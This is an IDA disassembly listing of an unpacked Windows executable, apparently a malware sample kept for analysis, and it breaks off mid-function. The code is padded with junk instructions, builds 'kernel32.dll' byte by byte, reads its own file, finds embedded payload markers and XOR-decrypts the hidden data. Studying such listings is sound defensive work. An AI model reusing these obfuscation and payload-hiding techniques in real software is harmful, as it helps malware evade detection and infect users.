;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 3D4D3708FC74D4A8FA7EDC4E8165643D
; File Name : u:\work\3d4d3708fc74d4a8fa7edc4e8165643d_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00002F08 ( 12040.)
; Section size in file : 00002F08 ( 12040.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg000 segment para public 'CODE' use32
assume cs:seg000
;org 401000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_40352E+13A�p
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
mov ebx, dword_403200
mov dword ptr [ebx+69Ah], 0
xor cl, 9
loc_401019: ; CODE XREF: sub_401000+54�j
sub dl, 58h
mov eax, [ebp+arg_8]
cmp [ebx+69Ah], eax
jl short loc_40102C
and cl, 24h
jmp short locret_401056
; ---------------------------------------------------------------------------
loc_40102C: ; CODE XREF: sub_401000+25�j
mov esi, [ebp+arg_0]
add esi, [ebx+69Ah]
mov byte ptr [esi], 0
mov eax, [ebx+69Ah]
mov [ebx+100h], eax
xor ch, 87h
and dl, 7Ch
add dword ptr [ebx+69Ah], 1
or cl, 0FEh
jmp short loc_401019
; ---------------------------------------------------------------------------
locret_401056: ; CODE XREF: sub_401000+2A�j
leave
retn 0Ch
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40105A proc near ; CODE XREF: sub_40352E+1D3�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4
mov ebx, dword_403200
mov dword ptr [ebx+623h], 0
loc_401070: ; CODE XREF: sub_40105A+3D�j
mov esi, [ebp+arg_0]
cmp byte ptr [esi], 0
jnz short loc_40107A
jmp short loc_401099
; ---------------------------------------------------------------------------
loc_40107A: ; CODE XREF: sub_40105A+1C�j
add [ebp+arg_0], 1
mov eax, [ebx+623h]
mov [ebx+5D1h], eax
and cl, 57h
add dword ptr [ebx+623h], 1
add dh, 2Fh
jmp short loc_401070
; ---------------------------------------------------------------------------
loc_401099: ; CODE XREF: sub_40105A+1E�j
mov eax, [ebx+623h]
jmp short $+2
leave
retn 4
sub_40105A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 14h
mov ebx, dword_403200
mov dword ptr [ebx+1C0h], 0
mov edi, [ebp+10h]
add edi, 20h
add ah, 22h
mov eax, [edi]
mov [ebx+0A6h], eax
sub dl, 0F4h
xor dh, 0FFh
mov edi, [ebp+10h]
add edi, 3Ch
mov eax, [edi]
mov [ebx+794h], eax
xor eax, eax
xor edx, edx
mov ch, 49h
sub ch, 2Ch
xor ecx, ecx
mov eax, [ebx+794h]
mov ecx, [ebx+0A6h]
div ecx
mov [ebx+794h], edx
mov ch, 0B6h
cmp dword ptr [ebx+794h], 0
jz short loc_40110C
jmp short loc_40111F
; ---------------------------------------------------------------------------
loc_40110C: ; CODE XREF: seg000:00401108�j
mov edi, [ebp+10h]
add edi, 3Ch
mov eax, [edi]
add [ebx+1C0h], eax
jmp loc_4011B4
; ---------------------------------------------------------------------------
loc_40111F: ; CODE XREF: seg000:0040110A�j
mov edi, [ebp+10h]
add edi, 3Ch
and al, 28h
mov eax, [edi]
mov [ebx+778h], eax
xor eax, eax
and dh, 0F8h
and dh, 51h
xor edx, edx
add ch, 50h
or cl, 19h
xor ecx, ecx
mov eax, [ebx+778h]
mov ecx, [ebx+0A6h]
div ecx
mov [ebx+778h], eax
mov eax, [ebx+778h]
mov [ebx+471h], eax
mov ch, 52h
mov eax, [ebx+471h]
mov [ebx+5F7h], eax
add dword ptr [ebx+471h], 1
mov eax, [ebx+471h]
mov [ebx+46Dh], eax
xor eax, eax
add dl, 45h
xor dl, 0CBh
xor edx, edx
or ch, 2Bh
sub cl, 8
xor ecx, ecx
mov eax, [ebx+46Dh]
mov ecx, [ebx+0A6h]
mul ecx
mov [ebx+46Dh], eax
mov eax, [ebx+46Dh]
add [ebx+1C0h], eax
loc_4011B4: ; CODE XREF: seg000:0040111A�j
mov dword ptr [ebx+6AAh], 0
or ch, 72h
and dl, 0C4h
loc_4011C4: ; CODE XREF: seg000:004013AA�j
mov edi, [ebp+0Ch]
add edi, 6
mov al, 0D4h
xor eax, eax
mov ax, [edi]
cmp [ebx+6AAh], eax
jl short loc_4011E1
or dl, 6
jmp loc_4013AF
; ---------------------------------------------------------------------------
loc_4011E1: ; CODE XREF: seg000:004011D7�j
mov eax, [ebx+6AAh]
mov [ebx+161h], eax
mov cl, 61h
xor eax, eax
and dl, 10h
xor edx, edx
sub ch, 0CEh
xor ecx, ecx
mov eax, [ebx+161h]
mov ecx, 28h
mul ecx
mov [ebx+161h], eax
and dh, 10h
mov esi, [ebp+14h]
add esi, [ebx+161h]
add esi, 8
sub ch, 0F7h
cmp dword ptr [esi], 0
jnz short loc_40122A
jmp loc_401394
; ---------------------------------------------------------------------------
loc_40122A: ; CODE XREF: seg000:00401223�j
mov eax, [ebx+6AAh]
mov [ebx+60h], eax
add dh, 62h
xor eax, eax
xor cl, 0ECh
xor edx, edx
or ch, 4Eh
and ch, 6Ch
xor ecx, ecx
mov eax, [ebx+60h]
mov ecx, 28h
mul ecx
mov [ebx+60h], eax
mov edi, [ebp+14h]
add edi, [ebx+60h]
add edi, 8
mov eax, [edi]
mov [ebx+0C7h], eax
xor eax, eax
xor edx, edx
mov cl, 2Dh
xor ecx, ecx
mov eax, [ebx+0C7h]
mov ecx, [ebx+0A6h]
div ecx
mov [ebx+0C7h], edx
cmp dword ptr [ebx+0C7h], 0
jz short loc_40128A
jmp short loc_4012D7
; ---------------------------------------------------------------------------
loc_40128A: ; CODE XREF: seg000:00401286�j
mov eax, [ebx+6AAh]
mov [ebx+206h], eax
sub ch, 27h
xor eax, eax
sub dh, 0D9h
add cl, 3Fh
xor edx, edx
xor cl, 0E3h
xor ecx, ecx
mov eax, [ebx+206h]
mov ecx, 28h
mul ecx
mov [ebx+206h], eax
mov edi, [ebp+14h]
add edi, [ebx+206h]
add edi, 8
add dl, 9Ch
mov eax, [edi]
add [ebx+1C0h], eax
jmp loc_401394
; ---------------------------------------------------------------------------
loc_4012D7: ; CODE XREF: seg000:00401288�j
mov eax, [ebx+6AAh]
mov [ebx+0AEh], eax
xor eax, eax
sub ch, 0B2h
xor edx, edx
mov ch, 60h
or cl, 24h
xor ecx, ecx
mov eax, [ebx+0AEh]
mov ecx, 28h
mul ecx
mov [ebx+0AEh], eax
mov edi, [ebp+14h]
add edi, [ebx+0AEh]
add edi, 8
mov eax, [edi]
mov [ebx+603h], eax
and dl, 16h
xor eax, eax
xor edx, edx
xor ch, 6Bh
mov ch, 22h
xor ecx, ecx
mov eax, [ebx+603h]
mov ecx, [ebx+0A6h]
div ecx
mov [ebx+603h], eax
mov eax, [ebx+603h]
mov [ebx+471h], eax
sub ch, 0A2h
mov eax, [ebx+471h]
mov [ebx+254h], eax
add dword ptr [ebx+471h], 1
mov eax, [ebx+471h]
mov [ebx+151h], eax
xor ch, 0BBh
xor eax, eax
xor ch, 0DDh
xor edx, edx
xor ecx, ecx
mov eax, [ebx+151h]
mov ecx, [ebx+0A6h]
mul ecx
mov [ebx+151h], eax
mov eax, [ebx+151h]
add [ebx+1C0h], eax
loc_401394: ; CODE XREF: seg000:00401225�j
; seg000:004012D2�j
mov eax, [ebx+6AAh]
mov [ebx+0CBh], eax
add dword ptr [ebx+6AAh], 1
add cl, 10h
jmp loc_4011C4
; ---------------------------------------------------------------------------
loc_4013AF: ; CODE XREF: seg000:004011DC�j
mov eax, [ebx+1C0h]
jmp short $+2
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013BB proc near ; CODE XREF: sub_401A70+69�p
; sub_401A70+2AD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4
mov ebx, dword_403200
mov eax, [ebp+arg_0]
mov [ebx+33Eh], eax
xor cl, 73h
xor eax, eax
xor edx, edx
xor ecx, ecx
mov eax, [ebx+33Eh]
mov ecx, [ebp+arg_4]
div ecx
mov [ebx+33Eh], edx
cmp dword ptr [ebx+33Eh], 0
jz short loc_4013F5
jmp short loc_4013FC
; ---------------------------------------------------------------------------
loc_4013F5: ; CODE XREF: sub_4013BB+36�j
mov eax, [ebp+arg_0]
jmp short locret_40146C
; ---------------------------------------------------------------------------
jmp short locret_40146C
; ---------------------------------------------------------------------------
loc_4013FC: ; CODE XREF: sub_4013BB+38�j
mov eax, [ebp+arg_0]
mov [ebx+20Bh], eax
and dh, 0Ah
or dl, 17h
xor eax, eax
add cl, 0CBh
xor edx, edx
add ch, 46h
xor ecx, ecx
mov eax, [ebx+20Bh]
mov ecx, [ebp+arg_4]
div ecx
mov [ebx+20Bh], eax
mov eax, [ebx+20Bh]
mov [ebx+27Ah], eax
mov eax, [ebx+27Ah]
mov [ebx+392h], eax
xor dl, 0F0h
add dword ptr [ebx+27Ah], 1
mov eax, [ebx+27Ah]
mov [ebx+68h], eax
mov ch, 0A0h
xor eax, eax
xor edx, edx
or ch, 5Bh
add ch, 57h
xor ecx, ecx
mov eax, [ebx+68h]
mov ecx, [ebp+arg_4]
mul ecx
mov [ebx+68h], eax
locret_40146C: ; CODE XREF: sub_4013BB+3D�j
; sub_4013BB+3F�j
leave
retn 8
sub_4013BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401470 proc near ; CODE XREF: start+AA�p
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 48h
mov ebx, dword_403200
mov dword ptr [ebx+43Fh], 0
add ch, 90h
or ch, 0CFh
call dword ptr [ebx+607h]
mov [ebx+5A1h], eax
mov eax, [ebx+5A1h]
mov [ebx+21Fh], eax
mov dh, 5
cmp dword ptr [ebx+21Fh], 0
jz short loc_4014B1
jmp short loc_4014BB
; ---------------------------------------------------------------------------
loc_4014B1: ; CODE XREF: sub_401470+3D�j
mov eax, 0
jmp locret_4019D8
; ---------------------------------------------------------------------------
loc_4014BB: ; CODE XREF: sub_401470+3F�j
call dword ptr [ebx+37Ah]
mov [ebx+104h], eax
sub esp, 0Ch
or ch, 3Ch
mov eax, [ebx+104h]
mov [esp+54h+var_54], eax
sub ch, 56h
xor al, 71h
mov [esp+54h+var_50], 0
or dh, 0C9h
sub ch, 8Eh
mov [esp+54h+var_4C], 400h
xor dh, 0E9h
call dword ptr [ebx+617h]
mov [ebx+0F4h], eax
mov eax, [ebx+0F4h]
mov [ebx+376h], eax
mov eax, [ebx+376h]
mov [ebx+1B3h], eax
or cl, 9Dh
mov esi, [ebx+21Fh]
cmp byte ptr [esi], 22h
jz short loc_401528
jmp short loc_401591
; ---------------------------------------------------------------------------
loc_401528: ; CODE XREF: sub_401470+B4�j
mov eax, [ebx+21Fh]
mov [ebx+38Eh], eax
add dword ptr [ebx+38Eh], 1
mov eax, [ebx+38Eh]
mov [ebx+202h], eax
loc_401547: ; CODE XREF: sub_401470+11D�j
or dl, 0D2h
mov esi, [ebx+202h]
cmp byte ptr [esi], 0
jnz short loc_401557
jmp short loc_40158F
; ---------------------------------------------------------------------------
loc_401557: ; CODE XREF: sub_401470+E3�j
xor ah, 0F8h
mov esi, [ebx+202h]
cmp byte ptr [esi], 22h
jnz short loc_40156A
add cl, 0DEh
jmp short loc_40158F
; ---------------------------------------------------------------------------
loc_40156A: ; CODE XREF: sub_401470+F3�j
mov esi, [ebx+1B3h]
mov edi, [ebx+202h]
mov al, [edi]
mov [esi], al
xor dl, 70h
mov cl, 3Bh
add dword ptr [ebx+1B3h], 1
add dword ptr [ebx+202h], 1
jmp short loc_401547
; ---------------------------------------------------------------------------
loc_40158F: ; CODE XREF: sub_401470+E5�j
; sub_401470+F8�j
jmp short loc_4015E9
; ---------------------------------------------------------------------------
loc_401591: ; CODE XREF: sub_401470+B6�j
mov eax, [ebx+21Fh]
mov [ebx+202h], eax
and cl, 10h
loc_4015A0: ; CODE XREF: sub_401470+177�j
and dl, 7Eh
mov esi, [ebx+202h]
cmp byte ptr [esi], 0
jnz short loc_4015B0
jmp short loc_4015E9
; ---------------------------------------------------------------------------
loc_4015B0: ; CODE XREF: sub_401470+13C�j
mov esi, [ebx+202h]
cmp byte ptr [esi], 20h
jnz short loc_4015C3
and ch, 79h
and dh, 22h
jmp short loc_4015E9
; ---------------------------------------------------------------------------
loc_4015C3: ; CODE XREF: sub_401470+149�j
mov esi, [ebx+1B3h]
mov edi, [ebx+202h]
mov al, [edi]
mov [esi], al
or dl, 0F6h
or cl, 8Ah
add dword ptr [ebx+1B3h], 1
add dword ptr [ebx+202h], 1
jmp short loc_4015A0
; ---------------------------------------------------------------------------
loc_4015E9: ; CODE XREF: sub_401470:loc_40158F�j
; sub_401470+13E�j ...
mov esi, [ebx+1B3h]
mov byte ptr [esi], 0
add dh, 0D8h
mov esi, [ebx+376h]
add esi, 0
cmp byte ptr [esi], 0
jz short loc_401605
jmp short loc_40160F
; ---------------------------------------------------------------------------
loc_401605: ; CODE XREF: sub_401470+191�j
mov eax, 0
jmp locret_4019D8
; ---------------------------------------------------------------------------
loc_40160F: ; CODE XREF: sub_401470+193�j
sub esp, 1Ch
mov eax, [ebx+376h]
mov [esp+64h+var_64], eax
xor ch, 0F4h
and cl, 3Dh
mov [esp+64h+var_60], 80000000h
mov [esp+64h+var_5C], 1
mov dl, 79h
mov dl, 3
mov [esp+64h+var_58], 0
sub cl, 96h
mov cl, 27h
mov [esp+64h+var_54], 3
xor cl, 15h
mov [esp+64h+var_50], 0
mov [esp+64h+var_4C], 0
xor cl, 79h
call dword ptr [ebx+264h]
mov [ebx+258h], eax
mov eax, [ebx+258h]
mov [ebx+0Ch], eax
mov al, 8Eh
cmp dword ptr [ebx+0Ch], 0
jz short loc_40167F
jmp short loc_401689
; ---------------------------------------------------------------------------
loc_40167F: ; CODE XREF: sub_401470+20B�j
mov eax, 0
jmp locret_4019D8
; ---------------------------------------------------------------------------
loc_401689: ; CODE XREF: sub_401470+20D�j
sub esp, 8
mov cl, 4Bh
mov eax, [ebx+0Ch]
mov [esp+50h+var_50], eax
add ah, 1Ch
mov [esp+50h+var_4C], 0
call dword ptr [ebx+326h]
mov [ebx+32Eh], eax
mov eax, [ebx+32Eh]
mov [ebx+66Eh], eax
or ch, 0E4h
call dword ptr [ebx+37Ah]
mov [ebx+276h], eax
sub esp, 0Ch
and ah, 0EDh
mov eax, [ebx+276h]
mov [esp+54h+var_54], eax
mov dl, 59h
mov [esp+54h+var_50], 0
sub dl, 82h
mov dl, 0BAh
mov eax, [ebx+66Eh]
mov [esp+54h+var_4C], eax
or dl, 40h
call dword ptr [ebx+617h]
mov [ebx+788h], eax
mov eax, [ebx+788h]
mov [ebx+169h], eax
mov cl, 71h
or dh, 0A9h
sub esp, 14h
mov eax, [ebx+0Ch]
mov [esp+5Ch+var_5C], eax
mov dh, 0F5h
mov eax, [ebx+169h]
mov [esp+5Ch+var_58], eax
mov cl, 69h
mov eax, [ebx+66Eh]
mov [esp+5Ch+var_54], eax
and ch, 0D8h
lea edi, [ebx+31Ah]
mov [esp+5Ch+var_50], edi
or cl, 22h
mov [esp+5Ch+var_4C], 0
or cl, 3Bh
call dword ptr [ebx+5B5h]
mov [ebx+171h], eax
or dh, 0EBh
cmp dword ptr [ebx+171h], 0
jz short loc_401764
jmp short loc_40176E
; ---------------------------------------------------------------------------
loc_401764: ; CODE XREF: sub_401470+2F0�j
mov eax, 0
jmp locret_4019D8
; ---------------------------------------------------------------------------
loc_40176E: ; CODE XREF: sub_401470+2F2�j
sub esp, 4
mov eax, [ebx+0Ch]
mov [esp+4Ch+var_4C], eax
call dword ptr [ebx+798h]
mov [ebx+465h], eax
mov eax, [ebx+169h]
mov [ebx+202h], eax
mov eax, [ebx+169h]
mov [ebx+1E6h], eax
add dh, 0E8h
xor dl, 82h
mov eax, [ebx+66Eh]
add [ebx+1E6h], eax
mov eax, [ebx+1E6h]
mov [ebx+27Eh], eax
or dh, 8Dh
or cl, 0D0h
sub dword ptr [ebx+27Eh], 8
mov eax, [ebx+27Eh]
mov [ebx+22Bh], eax
loc_4017D2: ; CODE XREF: sub_401470+3EE�j
mov eax, [ebx+22Bh]
cmp [ebx+202h], eax
jnz short loc_4017E8
xor dh, 87h
sub dl, 48h
jmp short loc_401863
; ---------------------------------------------------------------------------
loc_4017E8: ; CODE XREF: sub_401470+36E�j
mov esi, [ebx+202h]
cmp dword ptr [esi], 41414141h
jz short loc_4017F8
jmp short loc_401849
; ---------------------------------------------------------------------------
loc_4017F8: ; CODE XREF: sub_401470+384�j
mov eax, [ebx+202h]
mov [ebx+25h], eax
mov cl, 2Ch
sub dh, 5Fh
add dword ptr [ebx+25h], 4
mov eax, [ebx+25h]
mov [ebx+1B3h], eax
mov esi, [ebx+1B3h]
cmp dword ptr [esi], 53524358h
jz short loc_401823
jmp short loc_401849
; ---------------------------------------------------------------------------
loc_401823: ; CODE XREF: sub_401470+3AF�j
mov eax, [ebx+202h]
mov [ebx+372h], eax
mov dh, 62h
or ch, 5
add dword ptr [ebx+372h], 8
mov eax, [ebx+372h]
mov [ebx+202h], eax
jmp short loc_401863
; ---------------------------------------------------------------------------
loc_401849: ; CODE XREF: sub_401470+386�j
; sub_401470+3B1�j
mov eax, [ebx+202h]
mov [ebx+67Ah], eax
add dword ptr [ebx+202h], 1
mov cl, 0FCh
jmp loc_4017D2
; ---------------------------------------------------------------------------
loc_401863: ; CODE XREF: sub_401470+376�j
; sub_401470+3D7�j
mov eax, [ebp+arg_0]
mov [ebx+581h], eax
mov eax, [ebx+22Bh]
cmp [ebx+202h], eax
jl short loc_40187F
jmp loc_401986
; ---------------------------------------------------------------------------
loc_40187F: ; CODE XREF: sub_401470+408�j
mov eax, [ebx+22Bh]
mov [ebx+599h], eax
mov eax, [ebx+202h]
sub [ebx+599h], eax
mov eax, [ebx+599h]
mov [ebx+64Ah], eax
add dword ptr [ebx+64Ah], 8
sub esp, 0Ch
mov cl, 25h
mov eax, [ebp+arg_0]
mov [esp+54h+var_54], eax
and cl, 90h
mov eax, [ebx+202h]
mov [esp+54h+var_50], eax
or dl, 11h
mov eax, [ebx+64Ah]
mov [esp+54h+var_4C], eax
or cl, 99h
call sub_402E80
mov [ebx+227h], eax
mov eax, [ebx+22Bh]
mov [ebx+14Dh], eax
mov eax, [ebx+202h]
sub [ebx+14Dh], eax
mov eax, [ebx+14Dh]
mov [ebx+579h], eax
add cl, 0C4h
and cl, 0D7h
add dword ptr [ebx+579h], 8
sub esp, 8
add dh, 5Ah
mov eax, [ebp+arg_0]
mov [esp+50h+var_50], eax
xor dh, 0ECh
or ch, 78h
mov ch, 2Fh
mov eax, [ebx+579h]
mov [esp+50h+var_4C], eax
or dh, 9Ch
call sub_4019DC
mov [ebx+743h], eax
mov eax, [ebx+22Bh]
mov [ebx+77Ch], eax
and dl, 98h
or dl, 0E7h
mov eax, [ebx+202h]
sub [ebx+77Ch], eax
mov eax, [ebx+77Ch]
mov [ebx+60Bh], eax
add dword ptr [ebx+60Bh], 8
mov esi, [ebp+arg_0]
add esi, [ebx+60Bh]
mov byte ptr [esi], 0
or ch, 1Fh
mov dword ptr [ebx+43Fh], 1
mov dh, 7Ah
loc_401986: ; CODE XREF: sub_401470+40A�j
call dword ptr [ebx+37Ah]
mov [ebx+59Dh], eax
sub esp, 0Ch
mov eax, [ebx+59Dh]
mov [esp+54h+var_54], eax
and dh, 0C8h
add ch, 75h
mov [esp+54h+var_50], 0
sub dl, 0ECh
mov cl, 0CDh
add ch, 0D1h
mov eax, [ebx+169h]
mov [esp+54h+var_4C], eax
or cl, 6Dh
xor cl, 4Dh
call dword ptr [ebx+1DEh]
mov [ebx+682h], eax
mov eax, [ebx+43Fh]
jmp short $+2
locret_4019D8: ; CODE XREF: sub_401470+46�j
; sub_401470+19A�j ...
leave
retn 4
sub_401470 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019DC proc near ; CODE XREF: sub_401470+4BF�p
; start+2A7�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov ebx, dword_403200
mov byte ptr [ebx+268h], 6Fh
add dh, 5Ch
and dh, 43h
mov dword ptr [ebx+61Fh], 0
and cl, 52h
loc_401A02: ; CODE XREF: sub_4019DC+8E�j
mov eax, [ebp+arg_4]
cmp [ebx+61Fh], eax
jl short loc_401A12
and ch, 0E5h
jmp short locret_401A6C
; ---------------------------------------------------------------------------
loc_401A12: ; CODE XREF: sub_4019DC+2F�j
mov edi, [ebp+arg_0]
add edi, [ebx+61Fh]
mov al, [edi]
mov [ebx+1D0h], al
or dl, 0
add cl, 0DEh
mov al, [ebx+268h]
xor [ebx+1D0h], al
mov esi, [ebp+arg_0]
add esi, [ebx+61Fh]
mov al, [ebx+1D0h]
mov [esi], al
mov cl, 3Eh
add byte ptr [ebx+268h], 93h
mov eax, [ebx+61Fh]
mov [ebx+773h], eax
or ch, 6Bh
add dword ptr [ebx+61Fh], 1
add cl, 88h
mov dh, 87h
jmp short loc_401A02
; ---------------------------------------------------------------------------
locret_401A6C: ; CODE XREF: sub_4019DC+34�j
leave
retn 8
sub_4019DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A70 proc near ; CODE XREF: sub_403CF9+159�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 14h
mov ebx, dword_403200
mov eax, [ebp+arg_14]
mov [ebx+109h], eax
mov cl, 0BAh
mov ch, 87h
sub esp, 0Ch
mov eax, [ebx+109h]
mov [esp+20h+var_20], eax
mov dh, 68h
mov eax, [ebp+arg_0]
mov [esp+20h+var_1C], eax
mov edi, [ebp+arg_C]
add edi, 3Ch
mov cl, 0CEh
mov eax, [edi]
mov [esp+20h+var_18], eax
call sub_402E80
mov [ebx+790h], eax
sub esp, 8
mov edi, [ebp+arg_C]
add edi, 3Ch
mov eax, [edi]
mov [esp+1Ch+var_1C], eax
xor ch, 65h
mov al, 75h
mov edi, [ebp+arg_C]
add edi, 20h
mov eax, [edi]
mov [esp+1Ch+var_18], eax
or cl, 3Fh
call sub_4013BB
mov [ebx+16Dh], eax
mov eax, [ebx+16Dh]
add [ebx+109h], eax
mov dword ptr [ebx+79Ch], 0
add cl, 0D2h
or cl, 28h
loc_401B00: ; CODE XREF: sub_401A70+348�j
mov edi, [ebp+arg_8]
add edi, 6
mov al, 4Ch
xor eax, eax
mov ax, [edi]
cmp [ebx+79Ch], eax
jl short loc_401B20
or dl, 1Fh
or dl, 68h
jmp loc_401DBD
; ---------------------------------------------------------------------------
loc_401B20: ; CODE XREF: sub_401A70+A3�j
mov eax, [ebx+79Ch]
mov [ebx+33Ah], eax
mov dl, 0CDh
xor eax, eax
or cl, 0B2h
xor edx, edx
xor ecx, ecx
mov eax, [ebx+33Ah]
mov ecx, 28h
mul ecx
mov [ebx+33Ah], eax
sub dh, 0CAh
mov esi, [ebp+arg_10]
add esi, [ebx+33Ah]
add esi, 10h
cmp dword ptr [esi], 0
jg short loc_401B63
jmp loc_401D36
; ---------------------------------------------------------------------------
loc_401B63: ; CODE XREF: sub_401A70+EC�j
mov eax, [ebx+79Ch]
mov [ebx+61Bh], eax
sub cl, 0Ch
mov dh, 0FDh
xor eax, eax
and cl, 1
add dl, 4Ch
xor edx, edx
xor ecx, ecx
mov eax, [ebx+61Bh]
mov ecx, 28h
mul ecx
mov [ebx+61Bh], eax
mov edi, [ebp+arg_10]
add edi, [ebx+61Bh]
add edi, 10h
or dh, 72h
mov eax, [edi]
mov [ebx+613h], eax
and dl, 87h
mov dl, 9Eh
mov eax, [ebx+79Ch]
mov [ebx+332h], eax
mov dl, 12h
sub dh, 3Bh
xor eax, eax
and cl, 0A4h
mov ch, 3Fh
xor edx, edx
or cl, 52h
sub ch, 0D5h
xor ecx, ecx
mov eax, [ebx+332h]
mov ecx, 28h
mul ecx
mov [ebx+332h], eax
xor al, 5Fh
mov edi, [ebp+arg_10]
add edi, [ebx+332h]
add edi, 8
mov eax, [edi]
cmp [ebx+613h], eax
jg short loc_401BFE
jmp short loc_401C3F
; ---------------------------------------------------------------------------
loc_401BFE: ; CODE XREF: sub_401A70+18A�j
mov eax, [ebx+79Ch]
mov [ebx+50h], eax
sub ch, 6
add dh, 16h
xor eax, eax
xor edx, edx
mov ch, 0FCh
add cl, 0B4h
xor ecx, ecx
mov eax, [ebx+50h]
mov ecx, 28h
mul ecx
mov [ebx+50h], eax
mov edi, [ebp+arg_10]
add edi, [ebx+50h]
add edi, 8
xor ah, 24h
mov eax, [edi]
mov [ebx+613h], eax
sub dh, 0AFh
add cl, 25h
loc_401C3F: ; CODE XREF: sub_401A70+18C�j
mov eax, [ebx+79Ch]
mov [ebx+69Eh], eax
mov cl, 0Ch
add ch, 0B7h
xor eax, eax
xor edx, edx
and ch, 0D7h
xor ecx, ecx
mov eax, [ebx+69Eh]
mov ecx, 28h
mul ecx
mov [ebx+69Eh], eax
mov eax, [ebp+arg_0]
mov [ebx+6A6h], eax
or dl, 29h
mov edi, [ebp+arg_10]
add edi, [ebx+69Eh]
add edi, 14h
mov eax, [edi]
add [ebx+6A6h], eax
sub esp, 0Ch
add al, 0C6h
mov eax, [ebx+109h]
mov [esp+20h+var_20], eax
sub cl, 0C5h
and ch, 0B2h
or dh, 0FBh
mov eax, [ebx+6A6h]
mov [esp+20h+var_1C], eax
and dl, 0B1h
or dh, 39h
xor ah, 3
mov eax, [ebx+613h]
mov [esp+20h+var_18], eax
add ch, 0DDh
call sub_402E80
mov [ebx+4], eax
mov eax, [ebx+79Ch]
mov [ebx+1E2h], eax
xor eax, eax
sub dl, 92h
xor edx, edx
xor ecx, ecx
mov eax, [ebx+1E2h]
mov ecx, 28h
mul ecx
mov [ebx+1E2h], eax
sub esp, 8
mov dl, 0D1h
mov edi, [ebp+arg_10]
add edi, [ebx+1E2h]
add edi, 8
mov eax, [edi]
mov [esp+1Ch+var_1C], eax
add dl, 0E5h
mov edi, [ebp+arg_C]
add edi, 20h
mov eax, [edi]
mov [esp+1Ch+var_18], eax
mov dh, 8
or ch, 87h
call sub_4013BB
mov [ebx+64Eh], eax
mov eax, [ebx+64Eh]
add [ebx+109h], eax
jmp short loc_401D9C
; ---------------------------------------------------------------------------
loc_401D36: ; CODE XREF: sub_401A70+EE�j
mov eax, [ebx+79Ch]
mov [ebx+1EAh], eax
xor eax, eax
xor edx, edx
xor ecx, ecx
mov eax, [ebx+1EAh]
mov ecx, 28h
mul ecx
mov [ebx+1EAh], eax
sub esp, 8
xor al, 58h
mov edi, [ebp+arg_10]
add edi, [ebx+1EAh]
add edi, 8
mov eax, [edi]
mov [esp+1Ch+var_1C], eax
mov edi, [ebp+arg_C]
add edi, 20h
and dl, 59h
mov eax, [edi]
mov [esp+1Ch+var_18], eax
add dh, 80h
mov dh, 0AAh
call sub_4013BB
mov [ebx+32Ah], eax
mov eax, [ebx+32Ah]
add [ebx+109h], eax
loc_401D9C: ; CODE XREF: sub_401A70+2C4�j
mov eax, [ebx+79Ch]
mov [ebx+642h], eax
xor dh, 0C8h
or ch, 6Eh
add dword ptr [ebx+79Ch], 1
sub dh, 0Ah
jmp loc_401B00
; ---------------------------------------------------------------------------
loc_401DBD: ; CODE XREF: sub_401A70+AB�j
mov eax, 1
jmp short $+2
leave
retn 18h
sub_401A70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401DC8 proc near ; CODE XREF: start+2A�p
var_44 = dword ptr -44h
var_40 = dword ptr -40h
push ebp
mov ebp, esp
sub esp, 3Ch
mov ebx, dword_403200
mov byte ptr [ebx+272h], 64h
or cl, 38h
mov byte ptr [ebx+26Dh], 65h
mov byte ptr [ebx+274h], 6Ch
add dh, 0FBh
mov byte ptr [ebx+275h], 0
mov byte ptr [ebx+271h], 2Eh
sub dl, 0B7h
sub cl, 0FFh
mov byte ptr [ebx+269h], 6Bh
sub cl, 3Dh
mov byte ptr [ebx+26Ch], 6Eh
mov byte ptr [ebx+26Bh], 72h
or ch, 19h
xor ch, 19h
mov byte ptr [ebx+270h], 32h
mov byte ptr [ebx+26Eh], 6Ch
mov dl, 0BCh
mov byte ptr [ebx+26Ah], 65h
sub dh, 45h
mov byte ptr [ebx+273h], 6Ch
xor ch, 0CFh
and dh, 74h
mov byte ptr [ebx+26Fh], 33h
or cl, 0FFh
sub esp, 4
add al, 0DBh
lea edi, [ebx+269h]
mov [esp+40h+var_40], edi
and dl, 75h
add cl, 47h
